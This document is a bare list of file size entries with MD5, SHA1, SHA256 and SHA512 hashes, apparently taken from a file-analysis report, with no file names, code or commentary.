MD5e7849f6c72816d45736e44a5030c7c57
SHA1900f5bb5036e248a4b8202c4349342e8229aa4dc
SHA256fdd3f471301d78682037fd72ca28c0431e1335c0e14142c334292eea2abe042d
SHA51206d901925dbcd5515b2f0472ce641ace482959e5a7107af36fc44c16503c0be4ba8b06da18c0b5d393a65a74619b8530c34d08c5a3910c656ce559df889ac6fa
-
Filesize
1.8MB
MD53e5932af15b6bc898fb92956924dbe9c
SHA103937971f72bb5c6eee2bd80862ff3efd52ea0a6
SHA25699d40ad07729d98c2c096e6c12337ab9bdb8cdc3f97ce5ad0e1419cd40ddd12a
SHA51240f6c80b8269d608e5cf06f04d99916e959829907e8cb105d503e2d0956115fa773d57567aa5b1a5c4fdf0b9065c87cafea730a0029a826f15b42e7982838a40
-
Filesize
475KB
MD54e2992bd99d7cac2fbfdeb67f933ea2c
SHA1fd4d2aa47a3c2bfe6dff97a7726f2b2a0cdba92b
SHA256a91f20f7a45e5e2bb2c2cf2c5e228f86a3743e3446c83e68967b18fe62f61ab0
SHA51223a76af5db2ea625136cee02f66a028b9011e90cc5f13bf414018d19724be009f6c2ed0db68cbcd2c9e582a6dc51d47d7c2093e0d3a2c9d8c3c4a9a93e916c9f
-
Filesize
1.1MB
MD59a4472e0c62a4055539093ad8006446f
SHA14d21ce424d623983836e3bdc50a2d7c861fb2f69
SHA25698fade475be495922d4f4017988c2355841550056cd43b70c8e3f25e5695bd8d
SHA512d9df13b599efd9702bf7aaeb998d888c39787cf3d18a4d10c62279780356952b24855f2806e1d7924d8d93a7d5ba706c62617ba101b08a8083949b886a629ade
-
Filesize
15KB
MD5346f3dbf1986ffe56210896b8385d09f
SHA13993990dbf68d7141a81a48e86b1223f18643e2c
SHA256c55680b2798a32aede65d095333f5efcd0fb1221160ac9be6c4d50fd973a5d90
SHA5120c0c5f7b8c7850fc6f3637999ceb37b533ff3bcc00dd8d51e837e5cc2c730205b15f7ab8eae66ce8a0042b3cf0c0914eb0b29a2b58d869bde171287e3c9e1f30
-
Filesize
595KB
MD5de6e439a6e83b5250ac07fafa2f168a3
SHA1e49465404fe928da8f8abe7164c208ef9a4e0b4c
SHA256c56918f996e4aec61d24b5e4b01d66716a9ab0ca0a3d94170d703bf2af94343b
SHA512bb949974d197239bcf4f3aea0091cc8bafb3121f232b2f12d0f499ea5578bd28173d6c276ebc558c7c32795cfd4ede79dfd07780a451c3b49f5259a0ae72a637
-
Filesize
372KB
MD528c8efae417b13d1d61c0f95006a57f4
SHA14caed59eca1f34dd7d6bc31fd8c5d1e52b83bf38
SHA2561942b8cae1988c470b0062cb407a144b6a8ddc84dba2eabd02f48a9938aef12f
SHA51257339a83c6cf875085bc17db2c17335f76d2aaf475dbae0a8636120476783b605e519085b64f566f4398f035bf011760947af482922cefc6aee736507b944a51
-
Filesize
347KB
MD5f51b2982c8ae296e2e0387f750e45203
SHA15b466019ed954e4c2d22c0aaf3ec3905dae0d69c
SHA256956f69a41e04cdbb15c13fa0ce72d1a294cf6fe5b49411ede682e92d71c3b62a
SHA5127e6e915f8666932031f0740896fd2f731a97c8bd70b8c2b4c1a18f20514797de06268a747dccd93697df5ba4256631dfb4a03d4a62876087f7ca5981ecdd376b
-
Filesize
384KB
MD55196a0dabe9d40b537dc61dc1f2709e1
SHA1164b528be3af76093fc80c53b8f83b587c6758c1
SHA25699eb05c08e6387126d54c74d5501ab4162f6e1d9e77c47ccb957c9ad6717498f
SHA51292bbcb9697b2ee02b0180c6dceaddcab3479a871f5dd962ffe760a27ef8ea5f4f9a0717f5792727ea0427449469ef82b74a390d18425f5047e83586e11b0ce74
-
Filesize
533KB
MD5004be0cfffbe1e967870d7a8052b9b36
SHA1508b6c5db26963fc7a853fc5eaf589c4cf948c23
SHA256a2bdf16ad2ff12e8a3ff183cfc7f9f3077c017139a2ea73de64b7ee329053800
SHA51259807932f3975dde7b298adc16d53a388c894cf77facab31ffc5c249b03e12dacf076ca445ea927583ea38c6669bf4d66aa015a601e1b2f2d2ce065cd0832e10
-
Filesize
396KB
MD5cb2e003f6a2c8156398ec9ec6cbaa3b6
SHA1127088877d91d364bd91e6a0e277bb62a6195cc3
SHA256f488c16497729b985b4eba543fe14740a5291d4e5a8fb732bee0c6ab1338d8d6
SHA51223a6cb52583e93c726a0197766ddec2fdc01657593868c4954c8251d5748b61ea76e69b83516082c3504cc764106bc6c143a8a24ef9d47bbd6b313804e9fbdfe
-
Filesize
508KB
MD505a5c67ae36c0555ef67a8f56d1f230d
SHA1e380623ba0b857add69d04d23ca468246b876c9a
SHA256beee305ec0be0b55370f150ab4fb7e136c4a4f94231e9c3b28c9c00dc3685f35
SHA5122a23c4862516725642ff53b23bf1168d2a453499bcfffe6c8a8488a764e5f29718942e224dfcf8da85bb466449b5eeb287c6be5f289718848b7193de0098a500
-
Filesize
1.1MB
MD5d704d16a4e2636d3a5d5b85490b8abd1
SHA1cd44f9878f243b48b8cd944e6632cf97993243b3
SHA256455ba3a0344aecdc5bb3e91a43dee5547a0915279a1cfe670ef008d404670e1f
SHA5121bc7bbffba2368a37065155ab3b24812d456ed991acd90134db113b47133f688ffb0a87da28895c2849af3fa8142785f879180413d0c82aac5bcecd4baf5321d
-
Filesize
1.4MB
MD5393d2a00526a013a59c9c028f08f147d
SHA1ebccd8a2399edf65389844df81e3e18036a08607
SHA25625e2536c947950951200d2c9ffd56816f530e91f4c1b198c5774f01158ce91d3
SHA51223b84c673b820be20c9d3690b1a71d6cd3a139d5fe922c1dbb77c7ad3b64544d36c17a11de8852604f2394cbe9edb9564d4b2ce7b002316c86b848a93d17e19b
-
Filesize
24KB
MD5a51464e41d75b2aa2b00ca31ea2ce7eb
SHA15b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA25616d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff
-
Filesize
1.0MB
MD5c203254dfa89cb710164d452cea2207c
SHA180923a93f7d4c1ad95240f608b97a6090d2e0474
SHA256c45e645bd0b4a8c3345a0b2ba50800d9f2693825f1198fcad531f436cfa69f5e
SHA5126b48b6bfdfa365c9af3c5e99f8ff993b6a78ee7bd0b9c9d1daa1eec62b386259b0073bae2fe885810f738fdb6e5735762418392617520514d7a5b3d644dc112a
-
Filesize
302KB
MD5bb179a05d0befdaa40a4f8f6be113a64
SHA1e011b2698b8ed75bccd78b8cf439d9710508b938
SHA2568c1c91701c7008dde4efb7fb19db5e8b7dcb0b41456d07b1883da3e2e28942eb
SHA51296b4b3f190dac050dc06826db18eafe8a1f58ea057f0928736f0b3ad272e74b3fb74e1fb881ee8d11d1b565297149062afb150d4c31f63f8e9f5aafbadc33135
-
Filesize
717KB
MD5143d719e01639c8a5510ad07dc755663
SHA16237c8218347d85bddeaf9bdcf7f9f0bbed01e87
SHA2569a58a0757eb62682bb80cbafd91f1a459ea9ca0b43065d311da209da188cf420
SHA512cac46c55a56ef3994338778c9aac8500efef07fb1ef7adce1f09fd3d0081eca3a4e81ca38dfe12fb27fafdcf579b54738849b8c4befed8825d5a026ca92f7b9c